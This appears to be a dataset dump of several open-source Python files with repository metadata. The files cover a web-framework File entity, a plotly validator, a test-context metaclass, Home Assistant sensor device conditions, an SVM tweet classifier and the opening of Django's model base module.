| text (string, lengths 4 to 1.02M) | meta (dict) |
|---|---|
class File(In.entity.Entity):
    '''File Entity class.
    '''
    def __init__(self, data = None, items = None, **args):
        self.nabar_id = 0
        self.size = 0
        self.mime1 = None
        self.mime2 = None
        self.path = None
        self.tmp_path = None # temporary uploaded path
        self.remote = 0
        self.private = 0
        self.data = {}
        super().__init__(data, items, **args)
@IN.register('File', type = 'Entitier')
class FileEntitier(In.entity.EntityEntitier):
    '''Base File Entitier'''
    # File needs entity insert/update/delete hooks
    invoke_entity_hook = True
    # load all is very heavy
    entity_load_all = False
@IN.register('File', type = 'Model')
class FileModel(In.entity.EntityModel):
    '''File Model'''
@IN.hook
def entity_model():
    return {
        'File' : { # entity name
            'table' : { # table
                'name' : 'file',
                'columns' : { # table columns / entity attributes
                    'id' : {},
                    'type' : {},
                    'created' : {},
                    'status' : {},
                    'nabar_id' : {},
                    'path' : {}, # file path
                    'size' : {}, # bytes
                    'mime1' : {}, # mime main type : image, audio, video
                    'mime2' : {}, # mime secondary type : jpeg, mpeg
                    'remote': {}, # 0 - local, 1 - remote file
                    'private' : {}, # 0 - public, 1 - private file
                    'data' : {}, # file data
                },
                'keys' : {
                    'primary' : 'id',
                },
            },
        },
    }
@IN.register('File', type = 'Themer')
class FileThemer(In.entity.EntityThemer):
    '''File themer'''
builtins.File = File
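# Illustrative sketch (standalone, hypothetical names; not the In framework's
# real API): the @IN.register / @IN.hook decorators used above follow a common
# registry + hook pattern, roughly like this.
if __name__ == '__main__':
    _registry = {}   # (name, type) -> class
    _hooks = {}      # hook name -> list of callables
    def register(name, type = 'Entitier'):
        '''Class decorator that files the class under (name, type).'''
        def decorator(cls):
            _registry[(name, type)] = cls
            return cls
        return decorator
    def hook(func):
        '''Function decorator that collects hook implementations by name.'''
        _hooks.setdefault(func.__name__, []).append(func)
        return func
    @register('File', type = 'Model')
    class DemoFileModel:
        pass
    @hook
    def demo_entity_model():
        return {'File': {'table': {'name': 'file'}}}
    assert _registry[('File', 'Model')] is DemoFileModel
    assert _hooks['demo_entity_model'][0]()['File']['table']['name'] == 'file'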
|
{
"content_hash": "98b557a72150a6638a56cf6d14ce3d55",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 58,
"avg_line_length": 21.73134328358209,
"alnum_prop": 0.5625,
"repo_name": "vinoth3v/In",
"id": "917e20b7d97b0a50c3e0dfd68f3a108ec38d89e7",
"size": "1457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "In/filer/entity_file.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "33032"
},
{
"name": "Python",
"bytes": "779047"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class HoverinfosrcValidator(_plotly_utils.basevalidators.SrcValidator):
    def __init__(self, plotly_name="hoverinfosrc", parent_name="candlestick", **kwargs):
super(HoverinfosrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
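# Illustrative sketch (standalone; BaseValidator and DemoSrcValidator are
# hypothetical stand-ins, not plotly internals): the kwargs.pop(key, default)
# calls above supply defaults for "edit_type" and "role" while still letting
# callers override them and pass extra keyword arguments through to the base.
if __name__ == "__main__":
    class BaseValidator:
        def __init__(self, plotly_name, parent_name, **kwargs):
            self.plotly_name = plotly_name
            self.parent_name = parent_name
            self.options = kwargs
    class DemoSrcValidator(BaseValidator):
        def __init__(self, plotly_name="demosrc", parent_name="demo", **kwargs):
            super().__init__(
                plotly_name=plotly_name,
                parent_name=parent_name,
                edit_type=kwargs.pop("edit_type", "none"),  # default unless overridden
                role=kwargs.pop("role", "info"),
                **kwargs
            )
    v = DemoSrcValidator(edit_type="calc")
    assert v.options == {"edit_type": "calc", "role": "info"}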
|
{
"content_hash": "091ab6f64633c5f8d1666e4aade3b9ee",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 88,
"avg_line_length": 38.083333333333336,
"alnum_prop": 0.6214442013129103,
"repo_name": "plotly/python-api",
"id": "04b3e9315624c34aba4bc03010b59ad874812c2b",
"size": "457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/candlestick/_hoverinfosrc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
}
|
import unittest
import unittest.mock
import re
import logging
import typing # noqa (use mypy typing)
import warnings
from typing import Any
from typing import Callable
from torment import decorators
from torment import fixtures
logger = logging.getLogger(__name__)
@property
def _module(self) -> str:
    '''Actual module name corresponding to this context's testing module.'''
    return re.sub(r'\.[^.]+', '', self.__module__.replace('test_', ''), 1)
class MetaContext(type):
    '''``torment.TestContext`` class creator.
    Generates all testing methods that correspond with the fixtures associated
    with a ``torment.TestContext``. Also updates the definitions of
    ``mocks_mask`` and ``mocks`` to include the union of all involved classes
    in the creation process (all parent classes and the class being created).
    When creating a ``torment.TestContext`` subclass, ensure you specify this
    class as its metaclass to automatically generate test cases based on its
    ``fixture_classes`` property.
    '''
    module = _module
    def __init__(cls, name, bases, dct) -> None:
        super(MetaContext, cls).__init__(name, bases, dct)
        cls.mocks_mask = set().union(getattr(cls, 'mocks_mask', set()), *[ getattr(base, 'mocks_mask', set()) for base in bases ])
        cls.mocks = set().union(getattr(cls, 'mocks', set()), *[ getattr(base, 'mocks', set()) for base in bases ])
        cls.docker_compose_services = set().union(getattr(cls, 'docker_compose_services', set()), *[ getattr(base, 'docker_compose_services', set()) for base in bases ])
        def generate_case(fixture: fixtures.Fixture) -> Callable[[Any], None]:
            '''Generate a ``unittest.TestCase`` compatible test method.
            Parameters
            ----------
            :``fixture``: the fixture to transform into a ``unittest.TestCase``
                          compatible test method
            Return Value(s)
            ---------------
            An acceptable method that nose will execute as a test case.
            '''
            def case(self) -> None:
                fixture.context = self
                fixture._execute()
            case.__name__ = fixture.name
            case.__doc__ = fixture.description
            if len(cls.mocks_mask):
                case.__doc__ += '—unmocked:' + ','.join(sorted(cls.mocks_mask))
            return case
        if not hasattr(cls, 'fixture_classes'):
            warnings.warn('type object \'{0}\' has no attribute \'fixture_classes\''.format(name))
        else:
            for fixture in fixtures.of(cls.fixture_classes, context = cls):
                _ = generate_case(fixture)
                setattr(cls, _.__name__, _)
class TestContext(unittest.TestCase):
'''Environment for Fixture execution.
Provides convenience methods indicating the environment a Fixture is
executing in. This includes a references to the real module corresponding
to the context's testing module as well as a housing for the assertion
methods.
Inherits most of its functionality from ``unittest.TestCase`` with a couple
of additions. TestContext does extend setUp.
When used in conjunction with ``torment.MetaContext``, the
``fixture_classes`` property must be an iterable of subclasses of
``torment.fixtures.Fixture``.
**Properties**
* ``module``
**Public Methods**
* ``patch``
**Class Variables**
:``mocks_mask``: set of mocks to mask from being mocked
:``mocks``: set of mocks this TestContext provides
'''
mocks_mask = set() # type: Set[str]
mocks = set() # type: Set[str]
module = _module
def setUp(self) -> None:
super().setUp()
logger.debug('self.__class__.mocks_mask: %s', self.__class__.mocks_mask)
logger.debug('self.__class__.mocks: %s', self.__class__.mocks)
@decorators.log
def patch(self, name: str, relative: bool = True) -> None:
'''Patch name with mock in actual module.
Sets up mock objects for the given symbol in the actual module
corresponding to this context's testing module.
**Parameters**
:``name``: the symbol to mock—must exist in the actual module under test
:``relative``: prefix actual module corresponding to this context's
testing module to the given symbol to patch
'''
prefix = ''
if relative:
prefix = self.module + '.'
logger.debug('prefix: %s', prefix)
_ = unittest.mock.patch(prefix + name)
setattr(self, 'mocked_' + name.replace('.', '_').strip('_'), _.start())
self.addCleanup(_.stop)
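# Illustrative sketch (simplified, hypothetical fixture class; not torment's
# actual Fixture API): how a metaclass in the spirit of MetaContext can turn a
# collection of fixtures into unittest-visible test methods at class-creation
# time, the same way generate_case()/setattr() are used above.
if __name__ == '__main__':
    class DemoFixture(object):
        def __init__(self, name, value, expected) -> None:
            self.name, self.value, self.expected = name, value, expected
    class DemoMetaContext(type):
        def __init__(cls, name, bases, dct) -> None:
            super(DemoMetaContext, cls).__init__(name, bases, dct)
            for fixture in getattr(cls, 'fixtures', ()):
                def case(self, fixture = fixture) -> None:
                    self.assertEqual(fixture.value * 2, fixture.expected)
                case.__name__ = 'test_' + fixture.name
                setattr(cls, case.__name__, case)
    class DoubleContext(unittest.TestCase, metaclass = DemoMetaContext):
        fixtures = [ DemoFixture('two', 2, 4), DemoFixture('five', 5, 10) ]
    # The metaclass generated test_two and test_five on DoubleContext:
    assert hasattr(DoubleContext, 'test_two') and hasattr(DoubleContext, 'test_five')
    DoubleContext('test_two').run()  # executes one generated case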
|
{
"content_hash": "3497317ce5466a0b4074f77b9de52ea0",
"timestamp": "",
"source": "github",
"line_count": 149,
"max_line_length": 169,
"avg_line_length": 31.503355704697988,
"alnum_prop": 0.6105666808691947,
"repo_name": "devx/torment",
"id": "a05eb82cfd1f1198a9b4ff6876933b019a1f7780",
"size": "5274",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "torment/contexts/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "92301"
}
],
"symlink_target": ""
}
|
"""Provides device conditions for sensors."""
from __future__ import annotations
import voluptuous as vol
from homeassistant.components.device_automation.exceptions import (
InvalidDeviceAutomationConfig,
)
from homeassistant.const import CONF_ABOVE, CONF_BELOW, CONF_ENTITY_ID, CONF_TYPE
from homeassistant.core import HomeAssistant, HomeAssistantError, callback
from homeassistant.helpers import condition, config_validation as cv
from homeassistant.helpers.entity import get_device_class, get_unit_of_measurement
from homeassistant.helpers.entity_registry import (
async_entries_for_device,
async_get_registry,
)
from homeassistant.helpers.typing import ConfigType
from . import DOMAIN, SensorDeviceClass
# mypy: allow-untyped-defs, no-check-untyped-defs
DEVICE_CLASS_NONE = "none"
CONF_IS_APPARENT_POWER = "is_apparent_power"
CONF_IS_BATTERY_LEVEL = "is_battery_level"
CONF_IS_CO = "is_carbon_monoxide"
CONF_IS_CO2 = "is_carbon_dioxide"
CONF_IS_CURRENT = "is_current"
CONF_IS_ENERGY = "is_energy"
CONF_IS_FREQUENCY = "is_frequency"
CONF_IS_HUMIDITY = "is_humidity"
CONF_IS_GAS = "is_gas"
CONF_IS_ILLUMINANCE = "is_illuminance"
CONF_IS_NITROGEN_DIOXIDE = "is_nitrogen_dioxide"
CONF_IS_NITROGEN_MONOXIDE = "is_nitrogen_monoxide"
CONF_IS_NITROUS_OXIDE = "is_nitrous_oxide"
CONF_IS_OZONE = "is_ozone"
CONF_IS_PM1 = "is_pm1"
CONF_IS_PM10 = "is_pm10"
CONF_IS_PM25 = "is_pm25"
CONF_IS_POWER = "is_power"
CONF_IS_POWER_FACTOR = "is_power_factor"
CONF_IS_PRESSURE = "is_pressure"
CONF_IS_REACTIVE_POWER = "is_reactive_power"
CONF_IS_SIGNAL_STRENGTH = "is_signal_strength"
CONF_IS_SULPHUR_DIOXIDE = "is_sulphur_dioxide"
CONF_IS_TEMPERATURE = "is_temperature"
CONF_IS_VOLATILE_ORGANIC_COMPOUNDS = "is_volatile_organic_compounds"
CONF_IS_VOLTAGE = "is_voltage"
CONF_IS_VALUE = "is_value"
ENTITY_CONDITIONS = {
SensorDeviceClass.APPARENT_POWER: [{CONF_TYPE: CONF_IS_APPARENT_POWER}],
SensorDeviceClass.BATTERY: [{CONF_TYPE: CONF_IS_BATTERY_LEVEL}],
SensorDeviceClass.CO: [{CONF_TYPE: CONF_IS_CO}],
SensorDeviceClass.CO2: [{CONF_TYPE: CONF_IS_CO2}],
SensorDeviceClass.CURRENT: [{CONF_TYPE: CONF_IS_CURRENT}],
SensorDeviceClass.ENERGY: [{CONF_TYPE: CONF_IS_ENERGY}],
SensorDeviceClass.FREQUENCY: [{CONF_TYPE: CONF_IS_FREQUENCY}],
SensorDeviceClass.GAS: [{CONF_TYPE: CONF_IS_GAS}],
SensorDeviceClass.HUMIDITY: [{CONF_TYPE: CONF_IS_HUMIDITY}],
SensorDeviceClass.ILLUMINANCE: [{CONF_TYPE: CONF_IS_ILLUMINANCE}],
SensorDeviceClass.NITROGEN_DIOXIDE: [{CONF_TYPE: CONF_IS_NITROGEN_DIOXIDE}],
SensorDeviceClass.NITROGEN_MONOXIDE: [{CONF_TYPE: CONF_IS_NITROGEN_MONOXIDE}],
SensorDeviceClass.NITROUS_OXIDE: [{CONF_TYPE: CONF_IS_NITROUS_OXIDE}],
SensorDeviceClass.OZONE: [{CONF_TYPE: CONF_IS_OZONE}],
SensorDeviceClass.POWER: [{CONF_TYPE: CONF_IS_POWER}],
SensorDeviceClass.POWER_FACTOR: [{CONF_TYPE: CONF_IS_POWER_FACTOR}],
SensorDeviceClass.PM1: [{CONF_TYPE: CONF_IS_PM1}],
SensorDeviceClass.PM10: [{CONF_TYPE: CONF_IS_PM10}],
SensorDeviceClass.PM25: [{CONF_TYPE: CONF_IS_PM25}],
SensorDeviceClass.PRESSURE: [{CONF_TYPE: CONF_IS_PRESSURE}],
SensorDeviceClass.REACTIVE_POWER: [{CONF_TYPE: CONF_IS_REACTIVE_POWER}],
SensorDeviceClass.SIGNAL_STRENGTH: [{CONF_TYPE: CONF_IS_SIGNAL_STRENGTH}],
SensorDeviceClass.SULPHUR_DIOXIDE: [{CONF_TYPE: CONF_IS_SULPHUR_DIOXIDE}],
SensorDeviceClass.TEMPERATURE: [{CONF_TYPE: CONF_IS_TEMPERATURE}],
SensorDeviceClass.VOLATILE_ORGANIC_COMPOUNDS: [
{CONF_TYPE: CONF_IS_VOLATILE_ORGANIC_COMPOUNDS}
],
SensorDeviceClass.VOLTAGE: [{CONF_TYPE: CONF_IS_VOLTAGE}],
DEVICE_CLASS_NONE: [{CONF_TYPE: CONF_IS_VALUE}],
}
CONDITION_SCHEMA = vol.All(
cv.DEVICE_CONDITION_BASE_SCHEMA.extend(
{
vol.Required(CONF_ENTITY_ID): cv.entity_id,
vol.Required(CONF_TYPE): vol.In(
[
CONF_IS_APPARENT_POWER,
CONF_IS_BATTERY_LEVEL,
CONF_IS_CO,
CONF_IS_CO2,
CONF_IS_CURRENT,
CONF_IS_ENERGY,
CONF_IS_FREQUENCY,
CONF_IS_GAS,
CONF_IS_HUMIDITY,
CONF_IS_ILLUMINANCE,
CONF_IS_OZONE,
CONF_IS_NITROGEN_DIOXIDE,
CONF_IS_NITROGEN_MONOXIDE,
CONF_IS_NITROUS_OXIDE,
CONF_IS_POWER,
CONF_IS_POWER_FACTOR,
CONF_IS_PM1,
CONF_IS_PM10,
CONF_IS_PM25,
CONF_IS_PRESSURE,
CONF_IS_REACTIVE_POWER,
CONF_IS_SIGNAL_STRENGTH,
CONF_IS_SULPHUR_DIOXIDE,
CONF_IS_TEMPERATURE,
CONF_IS_VOLATILE_ORGANIC_COMPOUNDS,
CONF_IS_VOLTAGE,
CONF_IS_VALUE,
]
),
vol.Optional(CONF_BELOW): vol.Any(vol.Coerce(float)),
vol.Optional(CONF_ABOVE): vol.Any(vol.Coerce(float)),
}
),
cv.has_at_least_one_key(CONF_BELOW, CONF_ABOVE),
)
async def async_get_conditions(
hass: HomeAssistant, device_id: str
) -> list[dict[str, str]]:
"""List device conditions."""
conditions: list[dict[str, str]] = []
entity_registry = await async_get_registry(hass)
entries = [
entry
for entry in async_entries_for_device(entity_registry, device_id)
if entry.domain == DOMAIN
]
for entry in entries:
device_class = get_device_class(hass, entry.entity_id) or DEVICE_CLASS_NONE
unit_of_measurement = get_unit_of_measurement(hass, entry.entity_id)
if not unit_of_measurement:
continue
templates = ENTITY_CONDITIONS.get(
device_class, ENTITY_CONDITIONS[DEVICE_CLASS_NONE]
)
conditions.extend(
{
**template,
"condition": "device",
"device_id": device_id,
"entity_id": entry.entity_id,
"domain": DOMAIN,
}
for template in templates
)
return conditions
@callback
def async_condition_from_config(
hass: HomeAssistant, config: ConfigType
) -> condition.ConditionCheckerType:
"""Evaluate state based on configuration."""
numeric_state_config = {
condition.CONF_CONDITION: "numeric_state",
condition.CONF_ENTITY_ID: config[CONF_ENTITY_ID],
}
if CONF_ABOVE in config:
numeric_state_config[condition.CONF_ABOVE] = config[CONF_ABOVE]
if CONF_BELOW in config:
numeric_state_config[condition.CONF_BELOW] = config[CONF_BELOW]
numeric_state_config = cv.NUMERIC_STATE_CONDITION_SCHEMA(numeric_state_config)
numeric_state_config = condition.numeric_state_validate_config(
hass, numeric_state_config
)
return condition.async_numeric_state_from_config(numeric_state_config)
async def async_get_condition_capabilities(hass, config):
"""List condition capabilities."""
try:
unit_of_measurement = get_unit_of_measurement(hass, config[CONF_ENTITY_ID])
except HomeAssistantError:
unit_of_measurement = None
if not unit_of_measurement:
raise InvalidDeviceAutomationConfig(
"No unit of measurement found for condition entity {config[CONF_ENTITY_ID]}"
)
return {
"extra_fields": vol.Schema(
{
vol.Optional(
CONF_ABOVE, description={"suffix": unit_of_measurement}
): vol.Coerce(float),
vol.Optional(
CONF_BELOW, description={"suffix": unit_of_measurement}
): vol.Coerce(float),
}
)
}
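# Illustrative sketch (reuses the vol/CONF_* imports at the top of this module;
# DEMO_SCHEMA and has_above_or_below are hypothetical, not Home Assistant
# helpers): CONDITION_SCHEMA above combines a base schema, vol.In for the
# condition type, vol.Coerce(float) for the numeric bounds, and an
# "at least one of above/below" check. A trimmed-down equivalent of that shape:
if __name__ == "__main__":
    def has_above_or_below(conf):
        if CONF_ABOVE not in conf and CONF_BELOW not in conf:
            raise vol.Invalid("must contain at least one of above, below")
        return conf
    DEMO_SCHEMA = vol.All(
        vol.Schema(
            {
                vol.Required(CONF_ENTITY_ID): str,
                vol.Required(CONF_TYPE): vol.In([CONF_IS_TEMPERATURE, CONF_IS_HUMIDITY]),
                vol.Optional(CONF_ABOVE): vol.Coerce(float),
                vol.Optional(CONF_BELOW): vol.Coerce(float),
            },
            extra=vol.ALLOW_EXTRA,
        ),
        has_above_or_below,
    )
    validated = DEMO_SCHEMA(
        {CONF_ENTITY_ID: "sensor.kitchen", CONF_TYPE: CONF_IS_TEMPERATURE, CONF_ABOVE: "21"}
    )
    assert validated[CONF_ABOVE] == 21.0  # coerced from the string "21"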
|
{
"content_hash": "55a0363b696b3ab8f8e1721f6fff581e",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 88,
"avg_line_length": 37.42583732057416,
"alnum_prop": 0.6328304781385835,
"repo_name": "home-assistant/home-assistant",
"id": "229e5069069c3516f350fccf27f3030dae05ae81",
"size": "7822",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/sensor/device_condition.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20557383"
},
{
"name": "Shell",
"bytes": "6671"
}
],
"symlink_target": ""
}
|
from sklearn import svm
class Models(object):
    def __init__(self, trained, evaluations, classify):
        self.trained = trained
        self.evaluations = evaluations
        self.classify = classify
        self.result = list()
    def svm_linear(self):
        """
        Classification of tweets with a linear Support Vector Machine
        """
        classification = svm.SVC(kernel='linear')
        classification.fit(self.trained, self.evaluations)
        prediction = classification.predict(self.classify)
        for p in prediction:
            self.result.append(p)
        print("\n##############################################################")
        print("The classification result of %d tweets is:\n" % len(self.result))
        print("Positive: %d tweets" % self.result.count(1))
        print("Negative: %d tweets" % self.result.count(2))
        print("Neutral: %d tweets" % self.result.count(3))
        print("Unknown: %d tweets" % self.result.count(4))
        return prediction
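# Illustrative usage sketch (toy vectors; assumes scikit-learn is installed and
# labels follow the 1=positive, 2=negative, 3=neutral, 4=unknown convention
# counted above):
if __name__ == "__main__":
    demo_trained = [[0.9, 0.1], [0.8, 0.2], [0.1, 0.9], [0.2, 0.8]]  # labelled feature vectors
    demo_labels = [1, 1, 2, 2]                                       # their sentiment labels
    demo_unlabeled = [[0.85, 0.15], [0.15, 0.85]]                    # tweets to classify
    model = Models(demo_trained, demo_labels, demo_unlabeled)
    prediction = model.svm_linear()   # prints the per-class counts
    print("Raw predictions: %s" % list(prediction))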
|
{
"content_hash": "b3f440a65443ec6474df88bb4a192bdc",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 80,
"avg_line_length": 34,
"alnum_prop": 0.5745098039215686,
"repo_name": "fernandopso/twitter-svm-tfidf.py",
"id": "16ad9e6a7b3eee0e2c53641f093db8cd2af84360",
"size": "1069",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "app/miner/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24330"
}
],
"symlink_target": ""
}
|
import copy
import inspect
import warnings
from itertools import chain
from django.apps import apps
from django.conf import settings
from django.core import checks
from django.core.exceptions import (
NON_FIELD_ERRORS, FieldDoesNotExist, FieldError, MultipleObjectsReturned,
ObjectDoesNotExist, ValidationError,
)
from django.db import (
DEFAULT_DB_ALIAS, DJANGO_VERSION_PICKLE_KEY, DatabaseError, connection,
connections, router, transaction,
)
from django.db.models.constants import LOOKUP_SEP
from django.db.models.deletion import CASCADE, Collector
from django.db.models.fields.related import (
ForeignObjectRel, OneToOneField, lazy_related_operation, resolve_relation,
)
from django.db.models.manager import Manager
from django.db.models.options import Options
from django.db.models.query import Q
from django.db.models.signals import (
class_prepared, post_init, post_save, pre_init, pre_save,
)
from django.db.models.utils import make_model_tuple
from django.utils.encoding import force_text
from django.utils.functional import curry
from django.utils.text import capfirst, get_text_list
from django.utils.translation import gettext_lazy as _
from django.utils.version import get_version
class Deferred:
def __repr__(self):
return '<Deferred field>'
def __str__(self):
return '<Deferred field>'
DEFERRED = Deferred()
def subclass_exception(name, parents, module, attached_to=None):
"""
Create exception subclass. Used by ModelBase below.
If 'attached_to' is supplied, the exception will be created in a way that
allows it to be pickled, assuming the returned exception class will be added
as an attribute to the 'attached_to' class.
"""
class_dict = {'__module__': module}
if attached_to is not None:
def __reduce__(self):
# Exceptions are special - they've got state that isn't
# in self.__dict__. We assume it is all in self.args.
return (unpickle_inner_exception, (attached_to, name), self.args)
def __setstate__(self, args):
self.args = args
class_dict['__reduce__'] = __reduce__
class_dict['__setstate__'] = __setstate__
return type(name, parents, class_dict)
class ModelBase(type):
"""Metaclass for all models."""
def __new__(cls, name, bases, attrs):
super_new = super().__new__
# Also ensure initialization is only performed for subclasses of Model
# (excluding Model class itself).
parents = [b for b in bases if isinstance(b, ModelBase)]
if not parents:
return super_new(cls, name, bases, attrs)
# Create the class.
module = attrs.pop('__module__')
new_attrs = {'__module__': module}
classcell = attrs.pop('__classcell__', None)
if classcell is not None:
new_attrs['__classcell__'] = classcell
new_class = super_new(cls, name, bases, new_attrs)
attr_meta = attrs.pop('Meta', None)
abstract = getattr(attr_meta, 'abstract', False)
if not attr_meta:
meta = getattr(new_class, 'Meta', None)
else:
meta = attr_meta
base_meta = getattr(new_class, '_meta', None)
app_label = None
# Look for an application configuration to attach the model to.
app_config = apps.get_containing_app_config(module)
if getattr(meta, 'app_label', None) is None:
if app_config is None:
if not abstract:
raise RuntimeError(
"Model class %s.%s doesn't declare an explicit "
"app_label and isn't in an application in "
"INSTALLED_APPS." % (module, name)
)
else:
app_label = app_config.label
new_class.add_to_class('_meta', Options(meta, app_label))
if not abstract:
new_class.add_to_class(
'DoesNotExist',
subclass_exception(
'DoesNotExist',
tuple(
x.DoesNotExist for x in parents if hasattr(x, '_meta') and not x._meta.abstract
) or (ObjectDoesNotExist,),
module,
attached_to=new_class))
new_class.add_to_class(
'MultipleObjectsReturned',
subclass_exception(
'MultipleObjectsReturned',
tuple(
x.MultipleObjectsReturned for x in parents if hasattr(x, '_meta') and not x._meta.abstract
) or (MultipleObjectsReturned,),
module,
attached_to=new_class))
if base_meta and not base_meta.abstract:
# Non-abstract child classes inherit some attributes from their
# non-abstract parent (unless an ABC comes before it in the
# method resolution order).
if not hasattr(meta, 'ordering'):
new_class._meta.ordering = base_meta.ordering
if not hasattr(meta, 'get_latest_by'):
new_class._meta.get_latest_by = base_meta.get_latest_by
is_proxy = new_class._meta.proxy
# If the model is a proxy, ensure that the base class
# hasn't been swapped out.
if is_proxy and base_meta and base_meta.swapped:
raise TypeError("%s cannot proxy the swapped model '%s'." % (name, base_meta.swapped))
# Add all attributes to the class.
for obj_name, obj in attrs.items():
new_class.add_to_class(obj_name, obj)
# All the fields of any type declared on this model
new_fields = chain(
new_class._meta.local_fields,
new_class._meta.local_many_to_many,
new_class._meta.private_fields
)
field_names = {f.name for f in new_fields}
# Basic setup for proxy models.
if is_proxy:
base = None
for parent in [kls for kls in parents if hasattr(kls, '_meta')]:
if parent._meta.abstract:
if parent._meta.fields:
raise TypeError(
"Abstract base class containing model fields not "
"permitted for proxy model '%s'." % name
)
else:
continue
if base is None:
base = parent
elif parent._meta.concrete_model is not base._meta.concrete_model:
raise TypeError("Proxy model '%s' has more than one non-abstract model base class." % name)
if base is None:
raise TypeError("Proxy model '%s' has no non-abstract model base class." % name)
new_class._meta.setup_proxy(base)
new_class._meta.concrete_model = base._meta.concrete_model
else:
new_class._meta.concrete_model = new_class
# Collect the parent links for multi-table inheritance.
parent_links = {}
for base in reversed([new_class] + parents):
# Conceptually equivalent to `if base is Model`.
if not hasattr(base, '_meta'):
continue
# Skip concrete parent classes.
if base != new_class and not base._meta.abstract:
continue
# Locate OneToOneField instances.
for field in base._meta.local_fields:
if isinstance(field, OneToOneField):
related = resolve_relation(new_class, field.remote_field.model)
parent_links[make_model_tuple(related)] = field
# Track fields inherited from base models.
inherited_attributes = set()
# Do the appropriate setup for any model parents.
for base in new_class.mro():
if base not in parents or not hasattr(base, '_meta'):
# Things without _meta aren't functional models, so they're
# uninteresting parents.
inherited_attributes |= set(base.__dict__.keys())
continue
parent_fields = base._meta.local_fields + base._meta.local_many_to_many
if not base._meta.abstract:
# Check for clashes between locally declared fields and those
# on the base classes.
for field in parent_fields:
if field.name in field_names:
raise FieldError(
'Local field %r in class %r clashes with field of '
'the same name from base class %r.' % (
field.name,
name,
base.__name__,
)
)
else:
inherited_attributes.add(field.name)
# Concrete classes...
base = base._meta.concrete_model
base_key = make_model_tuple(base)
if base_key in parent_links:
field = parent_links[base_key]
elif not is_proxy:
attr_name = '%s_ptr' % base._meta.model_name
field = OneToOneField(
base,
on_delete=CASCADE,
name=attr_name,
auto_created=True,
parent_link=True,
)
if attr_name in field_names:
raise FieldError(
"Auto-generated field '%s' in class %r for "
"parent_link to base class %r clashes with "
"declared field of the same name." % (
attr_name,
name,
base.__name__,
)
)
# Only add the ptr field if it's not already present;
# e.g. migrations will already have it specified
if not hasattr(new_class, attr_name):
new_class.add_to_class(attr_name, field)
else:
field = None
new_class._meta.parents[base] = field
else:
base_parents = base._meta.parents.copy()
# Add fields from abstract base class if it wasn't overridden.
for field in parent_fields:
if (field.name not in field_names and
field.name not in new_class.__dict__ and
field.name not in inherited_attributes):
new_field = copy.deepcopy(field)
new_class.add_to_class(field.name, new_field)
# Replace parent links defined on this base by the new
# field. It will be appropriately resolved if required.
if field.one_to_one:
for parent, parent_link in base_parents.items():
if field == parent_link:
base_parents[parent] = new_field
# Pass any non-abstract parent classes onto child.
new_class._meta.parents.update(base_parents)
# Inherit private fields (like GenericForeignKey) from the parent
# class
for field in base._meta.private_fields:
if field.name in field_names:
if not base._meta.abstract:
raise FieldError(
'Local field %r in class %r clashes with field of '
'the same name from base class %r.' % (
field.name,
name,
base.__name__,
)
)
else:
new_class.add_to_class(field.name, copy.deepcopy(field))
# Set the name of _meta.indexes. This can't be done in
# Options.contribute_to_class() because fields haven't been added to
# the model at that point.
for index in new_class._meta.indexes:
if not index.name:
index.set_name_with_model(new_class)
if abstract:
# Abstract base models can't be instantiated and don't appear in
# the list of models for an app. We do the final setup for them a
# little differently from normal models.
attr_meta.abstract = False
new_class.Meta = attr_meta
return new_class
new_class._prepare()
new_class._meta.apps.register_model(new_class._meta.app_label, new_class)
return new_class
def add_to_class(cls, name, value):
# We should call the contribute_to_class method only if it's bound
if not inspect.isclass(value) and hasattr(value, 'contribute_to_class'):
value.contribute_to_class(cls, name)
else:
setattr(cls, name, value)
def _prepare(cls):
"""Create some methods once self._meta has been populated."""
opts = cls._meta
opts._prepare(cls)
if opts.order_with_respect_to:
cls.get_next_in_order = curry(cls._get_next_or_previous_in_order, is_next=True)
cls.get_previous_in_order = curry(cls._get_next_or_previous_in_order, is_next=False)
# Defer creating accessors on the foreign class until it has been
# created and registered. If remote_field is None, we're ordering
# with respect to a GenericForeignKey and don't know what the
# foreign class is - we'll add those accessors later in
# contribute_to_class().
if opts.order_with_respect_to.remote_field:
wrt = opts.order_with_respect_to
remote = wrt.remote_field.model
lazy_related_operation(make_foreign_order_accessors, cls, remote)
# Give the class a docstring -- its definition.
if cls.__doc__ is None:
cls.__doc__ = "%s(%s)" % (cls.__name__, ", ".join(f.name for f in opts.fields))
get_absolute_url_override = settings.ABSOLUTE_URL_OVERRIDES.get(opts.label_lower)
if get_absolute_url_override:
setattr(cls, 'get_absolute_url', get_absolute_url_override)
if not opts.managers:
if any(f.name == 'objects' for f in opts.fields):
raise ValueError(
"Model %s must specify a custom Manager, because it has a "
"field named 'objects'." % cls.__name__
)
manager = Manager()
manager.auto_created = True
cls.add_to_class('objects', manager)
class_prepared.send(sender=cls)
@property
def _base_manager(cls):
return cls._meta.base_manager
@property
def _default_manager(cls):
return cls._meta.default_manager
class ModelState:
"""Store model instance state."""
def __init__(self, db=None):
self.db = db
# If true, uniqueness validation checks will consider this a new, as-yet-unsaved object.
# Necessary for correct validation of new instances of objects with explicit (non-auto) PKs.
# This impacts validation only; it has no effect on the actual save.
self.adding = True
class Model(metaclass=ModelBase):
